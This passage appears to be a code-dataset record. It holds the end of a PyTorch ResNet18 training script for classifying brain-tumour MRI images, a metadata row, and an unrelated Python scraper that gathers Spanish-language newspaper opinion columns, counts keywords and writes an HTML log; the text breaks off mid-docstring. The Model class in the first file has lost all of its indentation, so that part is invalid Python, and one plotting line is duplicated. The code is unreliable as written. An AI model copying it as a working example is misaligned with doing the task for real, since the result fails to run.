        out = self.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out = out + shortcut
        return self.relu(out)
#@: Custom build ResNet18 Model
class ResNet(nn.Module):
    """ResNet backbone assembled from *block* (BasicBlock here), with
    ``layers[i]`` blocks in stage i and a final FC classification head.

    NOTE(review): this project's dataset has 4 categories; callers should
    pass num_classes=4 explicitly (the default of 3 is kept unchanged for
    backward compatibility).
    """
    def __init__(self, block: object, layers: list[int],
                       num_classes: Optional[int] = 3,
                       zero_init_residual: Optional[bool] = False) -> None:
        super(ResNet, self).__init__()
        self.inplanes: int = 64
        # Stem: 7x7 stride-2 conv + BN + ReLU + 3x3 stride-2 max-pool.
        self.conv1 = nn.Conv2d(3, 64, kernel_size= 7, stride= 2, padding= 3, bias= False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        # Four residual stages; width doubles while resolution halves.
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        # He init for convs, constant init for batch-norms.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
        if zero_init_residual:
            # Zero-init the last BN of each residual branch so every block
            # starts as an identity mapping. The original also referenced a
            # `Bottleneck` class that is not defined anywhere in this file
            # (NameError whenever this flag was enabled); only BasicBlock
            # is handled now.
            for m in self.modules():
                if isinstance(m, BasicBlock):
                    nn.init.constant_(m.bn2.weight, 0)
    def _make_layer(self, block: object, planes: int, blocks: int, stride: Optional[int] = 1) -> nn.Sequential:
        """Stack *blocks* residual blocks; the first may downsample."""
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            # Was a bare `conv1x1(...)` -- that helper only exists on Utils,
            # so building any downsampling stage raised a NameError.
            downsample = nn.Sequential(
                Utils.conv1x1(self.inplanes, planes * block.expansion, stride),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for _ in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Return raw class logits of shape (batch, num_classes)."""
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)
        x = self.fc(x)
        return x
class Model():
def __init__(self, net: 'model', criterion: object,
optimizer: object,
num_epochs: int,
dataloaders: dict[str, object],
dataset_sizes: dict[str, int],
device: torch.device) -> None:
super(Model, self).__init__()
self.net = net
self.criterion = criterion
self.optimizer = optimizer
self.num_epochs = num_epochs
self.dataloaders = dataloaders
self.dataset_sizes = dataset_sizes
self.device = device
def train_validate(self, history: bool = False) -> dict[str, float]| None:
since = time.time()
best_model_wts = copy.deepcopy(self.net.state_dict())
best_acc: float = 0.0
self.history: dict[str, list] = {
x: [] for x in ['train_loss', 'val_loss', 'train_acc', 'val_acc']
}
for epoch in range(self.num_epochs):
print(f'Epoch {epoch + 1}/{self.num_epochs}')
print('-' * 10)
for phase in ['train', 'test']:
if phase == 'train':
self.net.train()
else:
self.net.eval()
running_loss: float = 0.0
running_corrects: int = 0
for images, labels in self.dataloaders[phase]:
images = images.to(self.device)
labels = labels.to(self.device)
self.optimizer.zero_grad()
with torch.set_grad_enabled(phase == 'train'):
outputs = self.net(images)
_, pred_labels = torch.max(outputs, 1)
loss = self.criterion(outputs, labels)
if phase == 'train':
loss.backward()
self.optimizer.step()
running_loss += loss.item() * images.size(0)
running_corrects += torch.sum(pred_labels == labels.data)
epoch_loss: float = running_loss/ self.dataset_sizes[phase]
epoch_acc: float = running_corrects.double()/ self.dataset_sizes[phase]
if phase == 'train':
self.history['train_loss'].append(epoch_loss)
self.history['train_acc'].append(epoch_acc)
else:
self.history['val_loss'].append(epoch_loss)
self.history['val_acc'].append(epoch_acc)
print(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
if phase == 'test' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(self.net.state_dict())
print()
time_elapsed = time.time() - since
print(f'Training Completed in {time_elapsed // 60:.0f}m {time_elapsed % 60:.0f}s')
print(f'Best Val Acc: {best_acc:.4f}')
if history:
return self.history
def train_ValAcc(self) -> 'plot':
train_acc_list = [float(x.cpu().numpy()) for x in self.history['train_acc']]
test_acc_list = [float(x.cpu().numpy()) for x in self.history['val_acc']]
plt.plot(train_acc_list, '-bx')
plt.plot(test_acc_list, '-rx')
plt.title('Model Accuracy Plot')
plt.xlabel('No of Epochs')
plt.ylabel('Accuracy')
plt.legend(['train', 'validation'], loc= 'best')
plt.show()
def train_valLoss(self) -> 'plot':
train_loss_list = [float(x) for x in self.history['train_loss']]
test_loss_list = [float(x) for x in self.history['val_loss']]
plt.plot(train_loss_list, '-bx')
plt.plot(train_loss_list, '-bx')
plt.plot(test_loss_list, '-rx')
plt.title('Model Loss Plot')
plt.xlabel('No of Epoch')
plt.ylabel('Loss')
plt.legend(['train', 'validation'], loc= 'best')
plt.show()
    def confusion_matrix(self, class_names: list[str]) -> 'plot':
        """Build and display the confusion matrix over the 'test' loader.

        class_names: display labels, one per class, in label-index order.
        Rows are true labels, columns are predicted labels.
        """
        n_classes: int = len(class_names)
        confusion_matrix = torch.zeros(n_classes, n_classes)
        # Inference only: no gradients needed while tallying predictions.
        with torch.no_grad():
            for images, labels in self.dataloaders['test']:
                images = images.to(self.device)
                labels = labels.to(self.device)
                pred_labels = self.net(images)
                _, pred_labels = torch.max(pred_labels, 1)
                # Increment one cell per (true, predicted) sample pair.
                for t, p in zip(labels.view(-1), pred_labels.view(-1)):
                    confusion_matrix[t.long(), p.long()] += 1
        plt.figure(figsize= (8, 5))
        df_cm = pd.DataFrame(confusion_matrix, index= class_names, columns= class_names).astype(int)
        df_cm = sns.heatmap(df_cm, annot= True, fmt= '.3g', cmap= 'Blues')
        df_cm.yaxis.set_ticklabels(df_cm.yaxis.get_ticklabels(), rotation= 0, ha= 'right', fontsize= 10)
        df_cm.xaxis.set_ticklabels(df_cm.xaxis.get_ticklabels(), rotation= 45, ha= 'right', fontsize= 10)
        plt.ylabel('True label')
        plt.xlabel('Predicted label')
        plt.title('Confusion Matrix')
        plt.show()
#@: Driver Code
if __name__ == '__main__':
    # Dataset location and directory layout: <path>/<train|test>/<category>/
    path: 'dir_path' = 'C:\\Users\\RAHUL\\OneDrive\\Desktop\\tumor_dataset'
    sub_path: list[str] = ['train', 'test']
    categories: list[str] = ['glioma_tumor', 'meningioma_tumor', 'no_tumor', 'pituitary_tumor']
    # Fix: the original Compose list was missing the commas after
    # RandomVerticalFlip() and ToTensor(), which is a SyntaxError.
    transforms_list = transforms.Compose([
        transforms.Resize(256),
        transforms.RandomCrop(256),
        transforms.RandomRotation(360),
        transforms.RandomVerticalFlip(),
        transforms.ToTensor(),
        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
    ])
    train_data: object = TumorDataset(
        path= path,
        sub_path= sub_path[0],
        categories= categories,
        transform= transforms_list
    )
    test_data: object = TumorDataset(
        path= path,
        sub_path= sub_path[1],
        categories= categories,
        transform= transforms_list
    )
    train_loader = torch.utils.data.DataLoader(train_data, batch_size= 10, shuffle= True)
    test_loader = torch.utils.data.DataLoader(test_data, batch_size= 10)
    # Renamed from `covid_plots`: this project classifies brain tumors.
    tumor_plots = TumorAnalysis(data= train_data, loader= train_loader)
    tumor_plots.batchImg_display()
    dataset_sizes: dict[str, int] = {
        'train': len(train_data),
        'test': len(test_data)
    }
    dataloaders: dict[str, object] = {
        'train': train_loader,
        'test': test_loader
    }
    # Fix: construct an actual torch.device (the original bound a plain str
    # to a variable annotated torch.device).
    device: torch.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
    model = ResNet(BasicBlock, [2, 2, 2, 2]).to(device)
    criterion = nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(model.parameters(), lr= 1e-3)
    image_classification_model = Model(
        net= model,
        criterion= criterion,
        optimizer= optimizer,
        num_epochs= 100,
        dataloaders= dataloaders,
        dataset_sizes= dataset_sizes,
        device= device
    )
    image_classification_model.train_validate()
    image_classification_model.train_ValAcc()
    image_classification_model.train_valLoss()
    image_classification_model.confusion_matrix(class_names= categories)
| [
"noreply@github.com"
] | noreply@github.com |
9ebb3ef4090282a4cf52fcc2b5888d18b54359f9 | 9308f06d79f7045f4a2866b103384231751e21b8 | /fetchURL-es.py | c71adb38e942c784d093a37079c34fa65ddbfdf5 | [] | no_license | orgullomoore/watchingamerica | ef51251caa74916599f787a6197e9c099d02be7a | d08f26fe73d027b68e4cb6b3d7a0b92ba9d80897 | refs/heads/master | 2016-08-04T15:15:49.906676 | 2014-07-11T17:11:30 | 2014-07-11T17:11:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,007 | py | import urllib.request
from urllib.error import URLError
import urllib
import codecs
import time
import re
# Build a timestamped log filename.  strftime zero-pads every field, so
# names are fixed-width and sort chronologically; the original concatenated
# unpadded ints (e.g. '201437...' for 2014-03-07), which does not sort.
currtime = time.gmtime()
currtimestr = time.strftime('%Y%m%d%H%M%S', currtime)
logName = 'Log-' + currtimestr + '.html'
def fetchURL(someurl):
    """Open a URL with a browser User-Agent.

    Returns the open HTTP response on success, or None when the request
    fails (the error is printed).  Callers should expect None on failure.
    """
    print('Fetching '+someurl)
    opener = urllib.request.build_opener()
    # Some sites reject the default Python User-Agent, so impersonate a browser.
    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
    try:
        response = opener.open(someurl)
    except URLError as e:
        if hasattr(e, 'reason'):
            print('We failed to reach a server.')
            print('Reason: ', e.reason)
        elif hasattr(e, 'code'):
            print('The server couldn\'t fulfill the request.')
            print('Error code: ', e.code)
        # Fix: the original fell off the end here (implicit None) and also
        # set an unused `result = 'ok'` flag in the success branch.
        return None
    return response
threshold=0 #num of hits needed to merit a log entry

def hitcounter(sourcetext):
    """Count occurrences of the keywords from palabrasclave.txt in sourcetext.

    Returns (total_hits, description) where description lists every matched
    keyword with its count, e.g. "Obama (2); ".  Keywords shorter than 3
    characters are ignored.

    Fix: the original removed short keywords from the list *while iterating
    it*, which skips the element after each removal; filtering into a new
    list is correct.
    """
    with codecs.open('palabrasclave.txt', 'r', 'utf8') as pcfile:
        pctext = pcfile.read()
    palabrasclave = [line.rstrip() for line in pctext.split('\n')]
    palabrasclave = [palabra for palabra in palabrasclave if len(palabra) >= 3]
    count = 0
    desc = ''
    for palabra in palabrasclave:
        if palabra in sourcetext:
            pccount = sourcetext.count(palabra)
            count += pccount
            desc += palabra + ' (' + str(pccount) + '); '
    return (count, desc)
def startLog():
    """Create the log file and write the HTML header: a sortable table
    (via kryogenix sorttable.js) with Title/Hits/Source/Date/Author/Desc
    columns.  Overwrites any existing file named ``logName``.

    NOTE(review): the '<meta http-le="" equiv=...' tag below looks like a
    mangled 'http-equiv' attribute — confirm against the intended template.
    (It is part of the emitted HTML, so it is left untouched here.)
    """
    towrite="""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <title>Spanish articles most likely to be about America</title>
  <meta http-le="" equiv="Content-Type"
 content="text/html">
 <meta charset="utf-8">
  <script type="text/javascript"
 src="http://www.kryogenix.org/code/browser/sorttable/sorttable.js"></script>
</head>
<body>
<table class="sortable">
  <thead><tr>
        <th class="">Title</th>
        <th class="">Hits</th>
        <th class="">Source</th>
        <th class="">Date</th>
        <th class="">Author</th>
        <th class="">Desc</th>
      </tr>
  </thead> <tbody>
    """
    logfile=codecs.open(logName, 'w', 'utf8')
    logfile.write(towrite)
    logfile.close()
def logRow(data):
    """Append one table row to the log file.

    data: sequence of cell strings, expected order
    (title, hits, source, date, author, desc).
    """
    cells = ''.join('<td>' + cell + '</td>' for cell in data)
    row = '<tr>' + cells + '</tr>'
    with codecs.open(logName, 'a', 'utf8') as logfile:
        logfile.write(row)
def endLog():
    """Append the closing table/body/html tags, finalizing the log file."""
    towrite="""
    </tbody><tfoot></tfoot>
</table>
</body>
</html>
"""
    logfile=codecs.open(logName, 'a', 'utf8')
    logfile.write(towrite)
    logfile.close()
def translateMonth(spanishdate):
    """Lower-case a Spanish date string and replace month names with their
    zero-padded numbers ('enero' -> '01', ...).

    Full month names are substituted before the 3-letter abbreviations so
    that e.g. 'junio' is consumed whole rather than half-matched by 'jun'.
    """
    full_names = ['enero', 'febrero', 'marzo', 'abril', 'mayo', 'junio',
                  'julio', 'agosto', 'septiembre', 'octubre', 'noviembre',
                  'diciembre']
    numbers = ['01', '02', '03', '04', '05', '06',
               '07', '08', '09', '10', '11', '12']
    abbreviations = [name[:3] for name in full_names]
    result = spanishdate.lower()
    # One ordered pass: all full names first, then all abbreviations.
    for name, number in zip(full_names + abbreviations, numbers + numbers):
        result = result.replace(name, number)
    return result
#######BEGIN INDIVIDUAL PUBS
###clarin
def claringenerator(maxnumber=10):
    """Scrape Clarín's opinion index and log every article whose keyword
    hit count exceeds the module-level `threshold`.

    maxnumber caps how many articles are fetched per run.
    NOTE(review): all split() markers here are tied to the site's markup at
    the time of writing — verify before reuse.
    """
    listofurls=[]
    caturl='http://www.clarin.com/opinion/'
    catpage=fetchURL(caturl).read().decode('utf8')
    # Isolate the auto-generated article listing from the rest of the page.
    relchunk=catpage.split('<ul class="items" id="listadoautomatico')[1]
    relchunk=relchunk.split('<div id="getMoreNotesContainer')[0]
    chops=relchunk.split('<li class="item">')
    for chop in chops[1:]:
        urlterminus=chop.split('<a href="')[1].split('"')[0]
        urlinicius='http://www.clarin.com'
        fullurl=urlinicius+urlterminus
        listofurls.append(fullurl)
    for url in listofurls[:maxnumber]:
        parsethis=clarinreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def clarinreader(url):
    """Parse one Clarín article page.

    Returns (linked_title, hits, source, date, author, desc); hits is the
    keyword count as a string, date is formatted YYYYMMDD.
    """
    source='Clarín (AR)'
    bulktext=fetchURL(url).read().decode('utf8')
    actualtext=bulktext.split('<div class="nota">')
    actualtext=actualtext[1].split('<!--|googlemap|-->')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split("_sf_async_config.authors = '")[1].split("'")[0]
    author=authorsnip.strip()[:25] #the pub does not separate authors from their titles
    datesnip=bulktext.split('<div class="breadcrumb">')[1].split('</ul>')[0]
    datesnip=datesnip.split('<li>')[-1].split('</li>')[0].strip()
    date=time.strftime("%Y%m%d", time.strptime(datesnip, "%d/%m/%y"))
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end clarin
###elcomercioPE
def elcomercioPEgenerator(maxnumber=10):
    """Scrape El Comercio (PE)'s columnists index and log qualifying articles."""
    listofurls=[]
    caturl='http://elcomercio.pe/opinion/columnistas'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<section class="box-resultados">')[1]
    relchunk=relchunk.split('</section>')[0]
    chops=relchunk.split('<article class="f-result')
    for chop in chops[1:]:
        urlterminus=chop.split('<h2><a href="')[-1].split('"')[0]
        urlterminus=urlterminus.split('?')[0] #we dont need variables
        urlinicius=''
        fullurl=urlinicius+urlterminus
        listofurls.append(fullurl)
    for url in listofurls[:maxnumber]:
        parsethis=elcomercioPEreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def elcomercioPEreader(url):
    """Parse one El Comercio (PE) article.

    Returns (linked_title, hits, source, date, author, desc).  This pub
    sometimes embeds the author in the title after ', por '; that form is
    preferred, with the <li class="autor"> tag as a fallback.
    """
    source='El Comercio (PE)'
    bulktext=fetchURL(url).read().decode('utf8')
    actualtext=bulktext.split('<div class="txt-nota" itemprop="articleBody">')
    actualtext=actualtext[1].split('<div class="tags">')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split("""<meta property="og:title" content='""")[1]
    titlesnip=titlesnip.split("'")[0]
    author=''
    try:
        titlesnip=titlesnip.split(', por ')[0] # pub includes author in title
        author=titlesnip.split(', por ')[1]
    except:
        titlesnip=titlesnip
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    if author=='':
        try:
            author=bulktext.split('<li class="autor">')[1].split('</li>')[0]
        except:
            author='None found.'
    author=author.strip()
    datesnip=bulktext.split('<meta name="bi3dPubDate" content="')[1].split(' ')[0]
    datesnip=datesnip.replace('-', '')
    date=datesnip.strip()
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end elcomercioPE
###elespectador
def elespectadorgenerator(maxnumber=10):
    """Scrape El Espectador (CO)'s daily columnists block and log qualifying articles."""
    listofurls=[]
    caturl='http://www.elespectador.com/opinion'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<!--Inicio Columnistas del dia-->')[1]
    relchunk=relchunk.split('<!--Fin Columnistas del dia-->')[0]
    chops=relchunk.split('<div class="una_noticia">')
    for chop in chops[1:]:
        urlterminus=chop.split('<h2>')[-1].split(' href="')[1].split('"')[0]
        urlinicius='http://www.elespectador.com'
        fullurl=urlinicius+urlterminus
        listofurls.append(fullurl)
    for url in listofurls[:maxnumber]:
        parsethis=elespectadorreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def elespectadorreader(url):
    """Parse one El Espectador (CO) article; return (linked_title, hits, source, date, author, desc)."""
    source='El Espectador (CO)'
    bulktext=fetchURL(url).read().decode('utf8')
    actualtext=bulktext.split('<div class="content_nota">')
    actualtext=actualtext[1].split('<div class="paginacion">')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<h5 class="columnista_nombre">Por: ')[1].split('</h5>')[0]
    author=authorsnip.strip()
    # publish time is ISO-like ('YYYY-MM-DDT...'); keep only YYYYMMDD.
    datesnip=bulktext.split('<meta name="cXenseParse:recs:publishtime" content="')[1].split('T')[0]
    datesnip=datesnip.replace('-', '')
    date=datesnip.strip()
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end elespectador
###elmercurio
def elmercuriogenerator(maxnumber=9):
    """Scrape El Mercurio (CL)'s blogs page (left column plus the featured
    article) and log qualifying articles."""
    listofurls=[]
    caturl='http://www.elmercurio.com/blogs/'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<!-- COLUMNA IZQUIERDA -->')[1]
    relchunk=relchunk.split('<!-- END COLUMNA IZQUIERDA -->')[0]
    chops=relchunk.split('<li id="NoticiaColumnista')
    urlinicius='http://www.elmercurio.com'
    for chop in chops[1:]:
        urlterminus=chop.split('<div class="titulo_box_home"')[1].split('<a href="')[1].split('"')[0]
        fullurl=urlinicius+urlterminus
        listofurls.append(fullurl)
    # The highlighted piece lives outside the left column; append it too.
    featuredurl=catpage.split('<div id="content_destacado_home"')[1].split('<a href="')[1].split('"')[0]
    featuredurl=urlinicius+featuredurl
    listofurls.append(featuredurl)
    for url in listofurls[:maxnumber]:
        parsethis=elmercurioreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def elmercurioreader(url):
    """Parse one El Mercurio (CL) article; return (linked_title, hits, source, date, author, desc)."""
    source='El Mercurio (CL)'
    bulktext=fetchURL(url).read().decode('utf8')
    actualtext=bulktext.split('<div class="content_info_despliegue" id="CajaCuerpo">')
    actualtext=actualtext[1].split('<div class="contenedor-paginacion-medios-inf-blog">')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<h1 class="titulo_despliegue_nota">')[1].split('</h1>')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    try:
        authorsnip=bulktext.split('<div class="txt_autor">')[1].split('</a>')[0].split('>')[-1]
        author=authorsnip.strip()
    except:
        author='None found.'
    # Date appears as e.g. 'Lunes 3 de Marzo de 2014'; rebuild as YYYYMMDD.
    datesnip=bulktext.split('<div class="fecha_despliegue_nota">')[1].split('</div>')[0]
    datesnipdiv=datesnip.split(' ')
    day=datesnipdiv[1]
    year=datesnipdiv[5]
    month=translateMonth(datesnipdiv[3])
    date=year+month+day
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end elmercurio
###elnacional
def elnacionalgenerator():
    """Scrape El Nacional (VE)'s opinion page (main listing + featured links)
    and log qualifying articles.  Unlike the other generators, the URL set
    is deduplicated and there is no maxnumber cap."""
    listofurls=[]
    caturl='http://www.el-nacional.com/opinion/'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<!-- PAGE MAIN (AREA) -->')[1]
    relchunk=relchunk.split('<!-- AUX LISTING ITEMS -->')[0]
    urlregexmain=r'<h2 class="entry-title"><a class="lnk" href="(\S+)">.+</a></h2>'
    urlregexfeat=r'<a href="(\/opinion\/\S+)" class="lnk".*>.+</a>'
    listofurls+=re.findall(urlregexmain, relchunk)
    listofurls+=re.findall(urlregexfeat, relchunk)
    listofurls=set(listofurls)
    for url in listofurls:
        if not url.startswith('http://'):
            url='http://www.el-nacional.com'+url
        parsethis=elnacionalreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def elnacionalreader(url):
    """Parse one El Nacional (VE) article; return (linked_title, hits, source, date, author, desc)."""
    source='El Nacional (VE)'
    bulktext=fetchURL(url).read().decode('utf8')
    actualtext=bulktext.split('<!-- MCE BODY CONTENT -->')
    actualtext=actualtext[1].split('<!-- END: PAGE BODY -->')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<title>')[1].split('</title>')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<link rel="alternate" title="')[1].split('"')[0]
    author=authorsnip.strip()
    # Dateline like '03 de Marzo de 2014' captured by regex, then rebuilt.
    datere=r'<small class="dateline"><span id="clock" class="time" style="color: white">.+</span> (\d{2}) de ([A-Z][a-z]+) de (\d{4})</small>'
    datesnipdiv=re.findall(datere, bulktext)[0]
    day=datesnipdiv[0]
    month=translateMonth(datesnipdiv[1].lower())
    year=datesnipdiv[2]
    date=year+month+day
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end elnacional
###elpais
def elpaisgenerator(maxnumber=20):
    """Scrape El País (ES)'s opinion index and log qualifying articles."""
    listofurls=[]
    caturl='http://elpais.com/elpais/opinion.html'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<div class="caja opinion">')[1]
    relchunk=relchunk.split('<div class="columna_secundaria">')[0]
    chops=relchunk.split('title="Ver noticia">')
    for chop in chops[:-1]:
        urlinicius='http://elpais.com'
        chopdiv=chop.split('\n')[-1]
        urlterminus=chopdiv.split('<a href="')[1].split('"')[0]
        # Some links are already absolute; avoid doubling the host.
        if urlterminus.startswith('http://'):
            urlinicius=''
        fullurl=urlinicius+urlterminus
        listofurls.append(fullurl)
    for url in listofurls[:maxnumber]:
        parsethis=elpaisreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def elpaisreader(url):
    """Parse one El País (ES) article; return (linked_title, hits, source, date, author, desc)."""
    source='El País (ES)'
    bulktext=fetchURL(url).read().decode('utf8')
    actualtext=bulktext.split('<div id="cuerpo_noticia" class="cuerpo_noticia">')
    actualtext=actualtext[1].split('<div class="envoltorio_publi estirar">')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<span class="autor">')[1].split('</a></span>')[0].split('>')[-1]
    author=authorsnip.strip()
    datesnip=bulktext.split('<meta name="DC.date" scheme="W3CDTF" content="')[1].split('"')[0]
    datesnip=datesnip.replace('-', '')
    date=datesnip.strip()
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end elpais
###eltiempo
def eltiempogenerator(maxnumber=7):
    """Scrape El Tiempo (CO)'s opinion columnists module and log qualifying articles."""
    listofurls=[]
    caturl='http://www.eltiempo.com/opinion'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<section class="mod_columnistas modulo">')[1]
    relchunk=relchunk.split('<!-- End column a -->')[0]
    chops=relchunk.split('<article class="articulo_columnistas">')
    urlinicius='http://eltiempo.com'
    for chop in chops[1:]:
        urlterminus=chop.split('<h2><a href="')[1].split('"')[0]
        fullurl=urlinicius+urlterminus
        listofurls.append(fullurl)
    for url in listofurls[:maxnumber]:
        parsethis=eltiemporeader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def eltiemporeader(url):
    """Parse one El Tiempo (CO) article.

    Returns (linked_title, hits, source, date, author, desc).  The site uses
    two date layouts, so parsing falls back to a <time> tag when the meta
    tag is absent.
    """
    source='El Tiempo (CO)'
    bulktext=fetchURL(url).read().decode('utf8')
    actualtext=bulktext.split('<div class="cuerpo_texto" itemprop="articleBody">')
    actualtext=actualtext[1].split('<footer class="footer-article">')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<h2 itemprop="name">')[1].split('</h2>')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<h3 class="creditos">')[1].split('</a></h3>')[0].split('>')[-1]
    author=authorsnip.strip()
    try:
        datesnip=bulktext.split('<meta property="article:published" itemprop="datePublished" content="')[1].split('"')[0]
        datesnipdiv=datesnip.split(' ')
        day=datesnipdiv[1]
        month=translateMonth(datesnipdiv[2])
        year=datesnipdiv[3]
    except:
        datesnip=bulktext.split('<time datetime="')[1].split('"')[0].split('| ')[1]
        datesnipdiv=datesnip.split(' ')
        day=datesnipdiv[0]
        if len(day)<2:
            day='0'+day
        month=translateMonth(datesnipdiv[2])
        year=datesnipdiv[-1]
    date=year+month+day
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end eltiempo
###eluniversal
def eluniversalgenerator(maxnumber=25):
    """Scrape El Universal (MX)'s opinion index (columns, editorials and
    featured pieces; blogs deliberately excluded) and log qualifying articles."""
    listofurls=[]
    caturl='http://www.eluniversal.com.mx/opinion-columnas-articulos.html'
    catpage=fetchURL(caturl).read().decode('utf8')
    relchunk=catpage.split('<div id="noteContent">')[1]
    relchunk=relchunk.split('<a href="http://foros.eluniversal.com.mx"><h4 class=')[0]
    chops=relchunk.split('<a class="linkBlack"') ##columns and editorials
    chops+=relchunk.split('<h2 class="linkBlueBigTimes"') #featured
    #chops+=relchunk.split('<h3 class="linkBlueMedium"><a') #excluding blogs for now
    urlinicius=''
    for chop in chops[1:]:
        try:
            urlterminus=chop.split(' href="')[1].split('"')[0]
            fullurl=urlinicius+urlterminus
            listofurls.append(fullurl)
        except:
            print('Fail')
    # Drop relative links (these are section links, not articles).
    for url in listofurls:
        if url.startswith('/'):
            listofurls.remove(url)
    for url in listofurls[:maxnumber]:
        parsethis=eluniversalreader(url)
        hits=int(parsethis[1])
        if hits>threshold:
            logRow(parsethis)
def eluniversalreader(url):
    """Parse one El Universal (MX) article.

    Returns (linked_title, hits, source, date, author, desc).  Paywalled
    articles are skipped by returning a zero-hit placeholder tuple.
    """
    source='El Universal (MX)'
    bulktext=fetchURL(url).read().decode('utf8', errors='replace')
    if '<h3>¿No es suscriptor de EL UNIVERSAL?</h3>' in bulktext:
        print('Excluding premium article')
        return ('', '0', '', '', '', '')
    actualtext=bulktext.split('<div class="noteText">')
    actualtext=actualtext[1].split('<div id="paginatorFooter">')[0]
    hitsinfo=hitcounter(actualtext)
    hits=hitsinfo[0]
    desc=hitsinfo[1]
    titlesnip=bulktext.split('<h2 class="noteTitle">')[1].split('</h2>')[0]
    title=titlesnip.strip()
    linkedtitle='<a href="'+url+'">'+title+'</a>'
    authorsnip=bulktext.split('<div id="noteContent"><span class="noteColumnist">')[1].split('</span>')[0]
    author=authorsnip.strip()
    datesnip=bulktext.split("<META name='date' content='")[1].split("'")[0]
    datesnip=datesnip.replace('-', '')
    date=datesnip.strip()
    for i in (source, title, author, date):
        print(i)
    return (linkedtitle, str(hits), source, date, author, desc)
###end eluniversal
###eluniverso
def eluniversogenerator():
    """Scrape opinion articles and log the qualifying ones.

    NOTE(review): this function fetches elmundo.es (Spain) but the reader
